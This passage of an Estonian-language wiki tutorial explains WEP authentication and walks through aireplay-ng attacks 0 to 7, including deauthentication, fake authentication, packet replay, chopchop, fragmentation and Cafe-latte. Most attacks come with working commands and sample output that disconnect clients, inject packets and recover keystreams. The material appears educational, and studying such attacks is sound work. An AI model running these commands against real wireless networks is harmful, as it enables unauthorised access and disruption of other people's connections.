* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP&#039;le.[6]&lt;br /&gt;
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP&#039;l sama WEP võti, ning AP autentib kliendi ära.[6]&lt;br /&gt;
* Klient ühendub võrku.[6]&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP&#039;le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)&lt;br /&gt;
&lt;br /&gt;
=Meetodid=&lt;br /&gt;
Meetodite pealkrijade ees on &amp;quot;Rünnak x:&amp;quot;. x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.&lt;br /&gt;
==Rünnak 0: Deauthentication==&lt;br /&gt;
&lt;br /&gt;
See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava &#039;&#039;access pointiga&#039;&#039; assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]&lt;br /&gt;
&lt;br /&gt;
* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta &#039;&#039;broadcastis&#039;&#039;.[2]&lt;br /&gt;
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]&lt;br /&gt;
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP &#039;&#039;cache&#039;&#039; tühjendada kui ühendus ära kaob)[2]&lt;br /&gt;
&lt;br /&gt;
NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
&lt;br /&gt;
====Suunatud====&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA -c CC:CC:CC:CC:CC:CC mon0&lt;br /&gt;
21:36:02  Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11&lt;br /&gt;
21:36:03  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|38 ACKs]&lt;br /&gt;
21:36:03  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:04  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:04  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|50 ACKs]&lt;br /&gt;
21:36:05  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:06  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:06  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 2|54 ACKs]&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]&lt;br /&gt;
* kanal peab olema sama millel AP reaalselt räägib[2]&lt;br /&gt;
* STMAC on rünnatava kliendi korrektne MAC aadress[2]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Sending 64 directed&#039;&#039;&#039; - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP&#039;le.[2]&lt;br /&gt;
* &#039;&#039;&#039;61&#039;&#039;&#039; - mitu paketti klient kätte sai[2]&lt;br /&gt;
* &#039;&#039;&#039;63&#039;&#039;&#039; - mitu paketti AP kätte sai[2]&lt;br /&gt;
&lt;br /&gt;
Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64&#039;le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]&lt;br /&gt;
&lt;br /&gt;
Suunatud &#039;&#039;versus&#039;&#039; broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]&lt;br /&gt;
&lt;br /&gt;
Kui sulle kliendi ACK&#039;ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]&lt;br /&gt;
&lt;br /&gt;
====Broadcast====&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA  mon0&lt;br /&gt;
21:33:25  Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11&lt;br /&gt;
NB: this attack is more effective when targeting&lt;br /&gt;
a connected wireless client (-c &amp;lt;client&#039;s mac&amp;gt;).&lt;br /&gt;
21:33:25  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:26  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:26  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:27  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:27  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:28  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nagu mainitud, &#039;&#039;broadcast&#039;&#039; lahtiühendamine on vähem efektiivsem.&lt;br /&gt;
&lt;br /&gt;
==Rünnak 1: Fake authentication==&lt;br /&gt;
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP&#039;le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.&lt;br /&gt;
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]&lt;br /&gt;
&lt;br /&gt;
Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
====Open Authentication====&lt;br /&gt;
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP&#039;ga suhtlema. Selles etapis hakkavad tavakliendid WEP&#039;i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP&#039;le saatma, uuesti ja uuesti.[4]&lt;br /&gt;
&amp;lt;pre&amp;gt;$ sudo aireplay-ng -1 0 -a AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0&lt;br /&gt;
21:40:20  Sending Authentication Request&lt;br /&gt;
21:40:20  Authentication successful&lt;br /&gt;
21:40:20  Sending Association Request&lt;br /&gt;
21:40:20  Association successful :-)&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]&lt;br /&gt;
&lt;br /&gt;
====Shared Key Authentication====&lt;br /&gt;
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP&#039;ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära &amp;quot;lahendada&amp;quot;) ning sellest tulenevalt ei saa me ka AP&#039;le mingeid pakke saata.&lt;br /&gt;
&amp;lt;pre&amp;gt;...&lt;br /&gt;
15:46:53  Sending Authentication Request&lt;br /&gt;
15:46:53  AP rejects open-system authentication&lt;br /&gt;
Please specify a PRGA-file (-y).&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul on vaja kinni püüda SKA &#039;&#039;handshake&#039;&#039; paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake&#039;i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]&lt;br /&gt;
&lt;br /&gt;
Kinnipüütud &#039;&#039;handshake&#039;&#039;`id salvestatakse &amp;quot;sharedkey-01-00-14-6C-7E-40-80.xor&amp;quot; formaadis faili. See fail tuleb vastavasse AP&#039;sse fake autentimisel/kliendi disconnectimisks anda kaasa &amp;quot;-y&amp;quot; käsurea argumendiga.[7]&lt;br /&gt;
&lt;br /&gt;
NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake&#039;i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 2: Interactive packet replay==&lt;br /&gt;
&lt;br /&gt;
See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.&lt;br /&gt;
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV&#039;sid.&lt;br /&gt;
Väga kasulik on panna peale ka &amp;quot;-m 68 -n 86&amp;quot; filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Naturaalsed paketid===&lt;br /&gt;
&lt;br /&gt;
Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida.  AP&#039;d edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on &amp;quot;To DS&amp;quot; lipuke seatud &amp;quot;1&amp;quot; peale.&lt;br /&gt;
Need  filtrid on seadistatavad -b,-d ja -t argumentidega.[8]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -2 -b AA:AA:AA:AA:AA:AA -d FF:FF:FF:FF:FF:FF -t 1 mon0&lt;br /&gt;
 Read 4 packets...&lt;br /&gt;
 &lt;br /&gt;
      Size: 68, FromDS: 0, ToDS: 1 (WEP)&lt;br /&gt;
 &lt;br /&gt;
           BSSID  =  AA:AA:AA:AA:AA:AA&lt;br /&gt;
       Dest. MAC  =  FF:FF:FF:FF:FF:FF&lt;br /&gt;
      Source MAC  =  CC:CC:CC:CC:CC:CC&lt;br /&gt;
 &lt;br /&gt;
      0x0000:  0841 de00 0014 6c7e 4080 000f b534 3030  .A....l~@....400&lt;br /&gt;
      0x0010:  ffff ffff ffff 4045 d16a c800 6f4f ddef  ......@E.j..oO..&lt;br /&gt;
      0x0020:  b488 ad7c 9f2a 64f6 ab04 d363 0efe 4162  ...|.*d....c..Ab&lt;br /&gt;
      0x0030:  8ad9 2f74 16bb abcf 232e 97ee 5e45 754d  ../t....#...^EuM&lt;br /&gt;
      0x0040:  23e0 883e                                #..&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Use this packet ? y&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Manipuleeritavad pakid===&lt;br /&gt;
&lt;br /&gt;
Eesmärk, nagu alati, on panna AP genereerima uusi IV&#039;sid. Ainuke vajalik argument on &amp;quot;-t 1&amp;quot; - see selekteerib ainult pakette mis liiguvad etherneti suunas.&lt;br /&gt;
&lt;br /&gt;
Me ei hooli ka mis lõppunkti MAC aadress on, kuna  me saame selle ära muuta.  Selleks on &amp;quot;-p 0841&amp;quot; argument, mis  muudab paki põhimõtte selliseks nagu ta saadetaks kliendist  AP&#039;sse - põmst. muudab &amp;quot;To DS&amp;quot; lipu &amp;quot;1&amp;quot;. Vaja on anda ka &amp;quot;-c&amp;quot; väärtuseks broadcast MAC.[8]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -2 -b AA:AA:AA:AA:AA:AA -t 1 -c FF:FF:FF:FF:FF:FF -p 0841 mon0&lt;br /&gt;
 Read 10 packets...&lt;br /&gt;
 &lt;br /&gt;
      Size: 124, FromDS: 0, ToDS: 1 (WEP)&lt;br /&gt;
 &lt;br /&gt;
           BSSID  =  AA:AA:AA:AA:AA:AA&lt;br /&gt;
       Dest. MAC  =  BB:BB:BB:BB:BB:BB&lt;br /&gt;
      Source MAC  =  CC:CC:CC:CC:CC:CC&lt;br /&gt;
 &lt;br /&gt;
      0x0000:  0841 2c00 0014 6c7e 4080 000f b534 3030  .A,...l~@....400&lt;br /&gt;
      0x0010:  0040 f477 e5c9 90c9 3d79 8b00 ce59 2bd7  .@.w....=y...Y+.&lt;br /&gt;
      0x0020:  96e7 fadf e0de 2e99 c019 4f85 9508 3bcc  ..........O...;.&lt;br /&gt;
      0x0030:  8d18 dbd5 92a7 a711 87d8 58d3 02b3 7be7  ..........X...{.&lt;br /&gt;
      0x0040:  8bf1 69c0 c596 3bd1 436a 9598 762c 9d1d  ..i...;.Cj..v,..&lt;br /&gt;
      0x0050:  7a57 3f3d e13c dad0 f2d8 0e65 6d66 d913  zW?=.&amp;lt;.....emf..&lt;br /&gt;
      0x0060:  9716 84a0 6f9a 0c68 2b20 7f55 ba9a f825  ....o..h+ U...%&lt;br /&gt;
      0x0070:  bf22 960a 5c7b 3036 290a 89d6            .&amp;quot;..\{06)...&lt;br /&gt;
 &lt;br /&gt;
 Use this packet ? y&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Klientideta võrgu ründamine===&lt;br /&gt;
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP&#039;d. Jooksuta aireplay-d kõige elementaarsemate argumentidega:&lt;br /&gt;
&amp;lt;pre&amp;gt;$ sudo aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt &amp;quot;y&amp;quot; esimesele tulevale pakile ja AP hakkab IV&#039;sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV&#039;sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 3: ARP request replay attack==&lt;br /&gt;
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV&#039;de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP&#039;le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.&lt;br /&gt;
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -3 -b AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0&lt;br /&gt;
 Saving ARP requests in replay_arp-0001-123456.cap&lt;br /&gt;
 You should also start airodump-ng to capture replies.&lt;br /&gt;
 Read 11978 packets (got 7193 ARP requests), sent 3902 packets...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Rünnak 4: KoreK chopchop attack==&lt;br /&gt;
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP&#039;d ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]&lt;br /&gt;
&lt;br /&gt;
===Teooria===&lt;br /&gt;
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]&lt;br /&gt;
&lt;br /&gt;
Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi &#039;&#039;plaintekst&#039;&#039; väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 0x00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada), et luua abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või ignoreeritakse. Iga saadetud pakk baseerub arvataval baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;$ sudo aireplay-ng -4 -h CC:CC:CC:CC:CC:CC -b AA:AA:AA:AA:AA:AA mon0&lt;br /&gt;
       Read 165 packets...&lt;br /&gt;
&lt;br /&gt;
         Size: 86, FromDS: 1, ToDS: 0 (WEP)&lt;br /&gt;
 &lt;br /&gt;
         BSSID  =  AA:AA:AA:AA:AA:AA&lt;br /&gt;
         Dest. MAC  =  FF:FF:FF:FF:FF:FF&lt;br /&gt;
         Source MAC  =  CC:CC:CC:CC:CC:CC&lt;br /&gt;
 &lt;br /&gt;
         0x0000:  0842 0000 ffff ffff ffff 0014 6c7e 4080  .B..........l~@.&lt;br /&gt;
         0x0010:  0040 f477 e5c9 603a d600 0000 5fed a222  .@.w..`:...._..&amp;quot;&lt;br /&gt;
         0x0020:  e2ee aa48 8312 f59d c8c0 af5f 3dd8 a543  ...H......._=..C&lt;br /&gt;
         0x0030:  d1ca 0c9b 6aeb fad6 f394 2591 5bf4 2873  ....j.....%.[.(s&lt;br /&gt;
         0x0040:  16d4 43fb aebb 3ea1 7101 729e 65ca 6905  ..C...&amp;gt;.q.r.e.i.&lt;br /&gt;
         0x0050:  cfeb 4a72 be46                           ..Jr.F&lt;br /&gt;
&lt;br /&gt;
 Use this packet ? y&lt;br /&gt;
&lt;br /&gt;
 Saving chosen packet in replay_src-0001-123456.cap&lt;br /&gt;
 &lt;br /&gt;
 Offset   85 ( 0% done) | xor = D3 | pt = 95 |  253 frames written in   760ms&lt;br /&gt;
 Offset   84 ( 1% done) | xor = EB | pt = 55 |  166 frames written in   498ms&lt;br /&gt;
 Offset   83 ( 3% done) | xor = 47 | pt = 35 |  215 frames written in   645ms&lt;br /&gt;
 Offset   82 ( 5% done) | xor = 07 | pt = 4D |  161 frames written in   483ms&lt;br /&gt;
 Offset   81 ( 7% done) | xor = EB | pt = 00 |   12 frames written in    36ms&lt;br /&gt;
 ...&lt;br /&gt;
 Offset   38 (90% done) | xor = FD | pt = 08 |  229 frames written in   688ms&lt;br /&gt;
 Offset   37 (92% done) | xor = 13 | pt = 01 |  232 frames written in   695ms&lt;br /&gt;
 Offset   36 (94% done) | xor = 83 | pt = 00 |   19 frames written in    58ms&lt;br /&gt;
 Offset   35 (96% done) | xor = 4E | pt = 06 |  230 frames written in   689ms&lt;br /&gt;
 Sent 957 packets, current guess: B9...&lt;br /&gt;
 &lt;br /&gt;
 The AP appears to drop packets shorter than 35 bytes.&lt;br /&gt;
 Enabling standard workaround: ARP header re-creation.&lt;br /&gt;
 &lt;br /&gt;
 Saving plaintext in replay_dec-0001-123457.cap&lt;br /&gt;
 Saving keystream in replay_dec-0001-123456.xor&lt;br /&gt;
 &lt;br /&gt;
 Completed in 21s (2.29 bytes/s)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Jee! Saad kasutada xor faili oma paki injectimiseks või lugemiseks paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine &#039;&#039;broadcasti&#039;&#039; ilma autentimata. Soovitatav on võtta ka lühem pakett kuna dekrüptimise aeg on lineaarselt seotud paketi pikkusega.[10]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 5: Fragmentation attack==&lt;br /&gt;
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA&#039;d. See rünnak ei tagasta WEP võtit. Saadud PRGA&#039;ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP&#039;lt vähemalt üks pakett.[12]&lt;br /&gt;
&lt;br /&gt;
Põhimõtteliselt saab programm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(kuna selliste pakettide sisu on teada) AP&#039;le. Kui pakett kajatakse tagasi AP poolt siis saab tagastatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]&lt;br /&gt;
&lt;br /&gt;
See rünnak nõuab head ühendust AP&#039;ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -5 -b AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0&lt;br /&gt;
Waiting for a data packet...&lt;br /&gt;
Read 96 packets...&lt;br /&gt;
&lt;br /&gt;
      Size: 120, FromDS: 1, ToDS: 0 (WEP)&lt;br /&gt;
&lt;br /&gt;
           BSSID  =  AA:AA:AA:AA:AA:AA&lt;br /&gt;
       Dest. MAC  =  CC:CC:CC:CC:CC:CC&lt;br /&gt;
      Source MAC  =  BB:BB:BB:BB:BB:BB&lt;br /&gt;
&lt;br /&gt;
      0x0000:  0842 0201 000f b5ab cb9d 0014 6c7e 4080  .B..........l~@.&lt;br /&gt;
      0x0010:  00d0 cf03 348c e0d2 4001 0000 2b62 7a01  ....4...@...+bz.&lt;br /&gt;
      0x0020:  6d6d b1e0 92a8 039b ca6f cecb 5364 6e16  mm.......o..Sdn.&lt;br /&gt;
      0x0030:  a21d 2a70 49cf eef8 f9b9 279c 9020 30c4  ..*pI.....&#039;.. 0.&lt;br /&gt;
      0x0040:  7013 f7f3 5953 1234 5727 146c eeaa a594  p...YS.4W&#039;.l....&lt;br /&gt;
      0x0050:  fd55 66a2 030f 472d 2682 3957 8429 9ca5  .Uf...G-&amp;amp;.9W.)..&lt;br /&gt;
      0x0060:  517f 1544 bd82 ad77 fe9a cd99 a43c 52a1  Q.D...w.....&amp;lt;R.&lt;br /&gt;
      0x0070:  0505 933f af2f 740e                      ...?./t.&lt;br /&gt;
&lt;br /&gt;
 Use this packet ? y&lt;br /&gt;
Saving chosen packet in replay_src-0001-123456.cap&lt;br /&gt;
 Data packet found!&lt;br /&gt;
 Sending fragmented packet&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 384 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 1500 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Saving keystream in fragment-0001-123456.xor&lt;br /&gt;
 Now you can build a packet with packetforge-ng out of that 1500 bytes keystream&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ja meil ongi olemas .xor fail millega saab &#039;&#039;custom&#039;&#039; pakette injectida. Muidugi on vajalik assotsiaseeritud klienti kelle nimelt pakette injectida.[12]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 6: Cafe-latte attack==&lt;br /&gt;
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - selle etapini jõudmiseks ei pea AP tõestama et ta WEP võtit teab.&lt;br /&gt;
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]&lt;br /&gt;
&lt;br /&gt;
See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki terviklikkuse kontroll.&lt;br /&gt;
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]&lt;br /&gt;
&lt;br /&gt;
Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC&#039;d et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]&lt;br /&gt;
&lt;br /&gt;
Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]&lt;br /&gt;
&lt;br /&gt;
===Kasutamine===&lt;br /&gt;
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama &amp;quot;-D&amp;quot; argumenti et lülitada välja AP otsimine.[14]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -6 -h CC:CC:CC:CC:CC:CC -b AA:AA:AA:AA:AA:AA -D mon0&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Rünnak 7: Client-oriented fragmentation attack==&lt;br /&gt;
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.&lt;br /&gt;
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 sihtmärgi IP ning sihtmärgi MAC peab olema nullbaidi jada.&lt;br /&gt;
Praktikas võib sihtmärgi MAC olla aga suvaline väärtus.[15]&lt;br /&gt;
&lt;br /&gt;
Saadud pakis on teada koht kus asub lähtepunkti IP aadress - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]&lt;br /&gt;
&lt;br /&gt;
===ARP===&lt;br /&gt;
Korrektse ARP päringu saatmiseks kliendile peame liigutama lähtekoha IP aadress positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks lähtekoha(kliendi) IP positsioonile 33(sihtmärk). Teine fragment on pakett mis kliendilt alguses saadi.[15]&lt;br /&gt;
&lt;br /&gt;
===IP===&lt;br /&gt;
IP paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]&lt;br /&gt;
&lt;br /&gt;
